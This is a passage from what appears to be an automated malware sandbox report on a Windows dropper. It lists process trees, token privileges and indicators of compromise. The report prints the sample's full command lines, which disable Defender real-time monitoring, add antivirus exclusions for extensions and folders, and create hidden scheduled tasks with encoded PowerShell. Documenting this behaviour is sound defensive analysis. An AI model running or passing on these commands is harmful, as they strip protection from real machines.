SeIncreaseQuotaPrivilege 1188 WMIC.exe Token: SeSecurityPrivilege 1188 WMIC.exe Token: SeTakeOwnershipPrivilege 1188 WMIC.exe Token: SeLoadDriverPrivilege 1188 WMIC.exe Token: SeSystemtimePrivilege 1188 WMIC.exe Token: SeBackupPrivilege 1188 WMIC.exe Token: SeRestorePrivilege 1188 WMIC.exe Token: SeShutdownPrivilege 1188 WMIC.exe Token: SeSystemEnvironmentPrivilege 1188 WMIC.exe Token: SeUndockPrivilege 1188 WMIC.exe Token: SeManageVolumePrivilege 1188 WMIC.exe Token: SeDebugPrivilege 1524 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2448 WMIC.exe Token: SeIncreaseQuotaPrivilege 2448 WMIC.exe Token: SeSecurityPrivilege 2448 WMIC.exe Token: SeTakeOwnershipPrivilege 2448 WMIC.exe Token: SeLoadDriverPrivilege 2448 WMIC.exe Token: SeSystemtimePrivilege 2448 WMIC.exe Token: SeBackupPrivilege 2448 WMIC.exe Token: SeRestorePrivilege 2448 WMIC.exe Token: SeShutdownPrivilege 2448 WMIC.exe Token: SeSystemEnvironmentPrivilege 2448 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2352 wrote to memory of 3064 2352 536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe 29 PID 2352 wrote to memory of 3064 2352 536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe 29 PID 2352 wrote to memory of 3064 2352 536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe 29 PID 2352 wrote to memory of 3064 2352 536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe 29 PID 2352 wrote to memory of 3064 2352 536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe 29 PID 2352 wrote to memory of 3064 2352 536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe 29 PID 2352 wrote to memory of 3064 2352 536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe 29 PID 3064 wrote to memory of 2572 3064 Install.exe 30 PID 3064 wrote to memory of 2572 3064 Install.exe 30 PID 3064 wrote to memory of 2572 3064 Install.exe 30 PID 3064 wrote to memory of 2572 3064 Install.exe 30 PID 3064 wrote to memory of 2572 3064 Install.exe 30 PID 3064 wrote to memory of 2572 3064 Install.exe 30 PID 3064 wrote to memory of 2572 3064 Install.exe 30 PID 2572 wrote to memory of 2288 2572 Install.exe 31 PID 2572 wrote to memory of 2288 2572 Install.exe 31 PID 2572 wrote to memory of 2288 2572 Install.exe 31 PID 2572 wrote to memory of 2288 2572 Install.exe 31 PID 2572 wrote to memory of 2288 2572 Install.exe 31 PID 2572 wrote to memory of 2288 2572 Install.exe 31 PID 2572 wrote to memory of 2288 2572 Install.exe 31 PID 2288 wrote to memory of 2740 2288 cmd.exe 33 PID 2288 wrote to memory of 2740 2288 cmd.exe 33 PID 2288 wrote to memory of 2740 2288 cmd.exe 33 PID 2288 wrote to memory of 2740 2288 cmd.exe 33 PID 2288 wrote to memory of 2740 2288 cmd.exe 33 PID 2288 wrote to memory of 2740 2288 cmd.exe 33 PID 2288 wrote to memory of 2740 2288 cmd.exe 33 PID 2740 wrote to memory of 2644 2740 forfiles.exe 189 PID 2740 wrote to memory of 2644 2740 forfiles.exe 189 PID 2740 wrote to memory of 2644 2740 forfiles.exe 189 PID 2740 wrote to memory of 2644 2740 forfiles.exe 189 PID 2740 wrote to memory of 2644 2740 forfiles.exe 189 PID 2740 wrote to memory of 2644 2740 forfiles.exe 189 PID 2740 wrote to memory of 2644 2740 forfiles.exe 189 PID 2644 wrote to memory of 2092 2644 cmd.exe 201 PID 2644 wrote to memory of 2092 2644 cmd.exe 201 PID 2644 wrote to memory of 2092 2644 cmd.exe 201 PID 2644 wrote to memory of 2092 2644 cmd.exe 201 PID 2644 wrote to memory of 2092 2644 cmd.exe 201 PID 2644 wrote to memory of 2092 2644 cmd.exe 201 PID 2644 wrote to memory of 2092 2644 cmd.exe 201 PID 2288 wrote to memory of 2540 2288 cmd.exe 36 PID 2288 wrote to memory of 2540 2288 cmd.exe 36 PID 2288 wrote to memory of 2540 2288 cmd.exe 36 PID 2288 wrote to memory of 2540 2288 cmd.exe 36 PID 2288 wrote to memory of 2540 2288 cmd.exe 36 PID 2288 wrote to memory of 2540 2288 cmd.exe 36 PID 2288 wrote to memory of 2540 2288 cmd.exe 36 PID 2540 wrote to memory of 2736 2540 forfiles.exe 37 PID 2540 wrote to memory of 2736 2540 forfiles.exe 37 PID 2540 wrote to memory of 2736 2540 forfiles.exe 37 PID 2540 wrote to memory of 2736 2540 forfiles.exe 37 PID 2540 wrote to memory of 2736 2540 forfiles.exe 37 PID 2540 wrote to memory of 2736 2540 forfiles.exe 37 PID 2540 wrote to memory of 2736 2540 forfiles.exe 37 PID 2736 wrote to memory of 2460 2736 cmd.exe 38 PID 2736 wrote to memory of 2460 2736 cmd.exe 38 PID 2736 wrote to memory of 2460 2736 cmd.exe 38 PID 2736 wrote to memory of 2460 2736 cmd.exe 38 PID 2736 wrote to memory of 2460 2736 cmd.exe 38 PID 2736 wrote to memory of 2460 2736 cmd.exe 38 PID 2736 wrote to memory of 2460 2736 cmd.exe 38 PID 2288 wrote to memory of 2512 2288 cmd.exe 194
Processes
-
C:\Users\Admin\AppData\Local\Temp\536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe"C:\Users\Admin\AppData\Local\Temp\536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2352 -
C:\Users\Admin\AppData\Local\Temp\7zS1258.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Users\Admin\AppData\Local\Temp\7zS140D.tmp\Install.exe.\Install.exe /feWvdidbUWf "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2572 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2644 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2092
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2736 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2460
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵PID:2512
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2452
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:2696
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵PID:2464
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2560
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:2596
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:1940
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:3068
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2480 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:2500
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵PID:2944
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:2984
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3020 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "butYHpXTvMdZIJsEKZ" /SC once /ST 22:30:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\KVPDPJQ.exe\" LY /dXqdidSHVt 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2792
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ"4⤵PID:676
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn butYHpXTvMdZIJsEKZ5⤵PID:2144
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn butYHpXTvMdZIJsEKZ6⤵PID:2780
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {EBE82560-87A7-4908-A764-7CFE0FE2F3F5} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2756
-
C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\KVPDPJQ.exeC:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\KVPDPJQ.exe LY /dXqdidSHVt 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:500 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:1992
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:1284
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1764
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:2028
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:2024
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:1676
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2036
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:1984
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:2076
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2328
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:2172
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2008
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2016
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:2404
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:2408
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:540
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gVPgcwhco" /SC once /ST 19:46:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1420
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gVPgcwhco"3⤵PID:1748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gVPgcwhco"3⤵PID:864
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:1892
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:2504
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:572
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:888
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gpZtkvKer" /SC once /ST 16:24:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gpZtkvKer"3⤵PID:2104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gpZtkvKer"3⤵PID:2516
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵PID:920
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵PID:2220
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2628 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:323⤵PID:2400
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:643⤵PID:1696
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:3000
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:323⤵PID:2936
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:324⤵PID:2676
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:643⤵PID:1976
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:644⤵PID:2800
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\mrYrpJCpOmktZWwz\WdDjMYNc\SPVvHlYWrpdFKHiO.wsf"3⤵PID:1700
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\mrYrpJCpOmktZWwz\WdDjMYNc\SPVvHlYWrpdFKHiO.wsf"3⤵
- Modifies data under HKEY_USERS
PID:2144 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BeEwQyQINcRtuKICoSR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1284
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1292
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\REeMUtPoCvFU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RcAuZGsZhuUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1336
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1616
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kLpsRMujXEpbC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:804
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tffvHWJZU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NGysLhxJEZNwhMVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2228
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1232
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2252
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:976
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\mrYrpJCpOmktZWwz" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2396
-
-
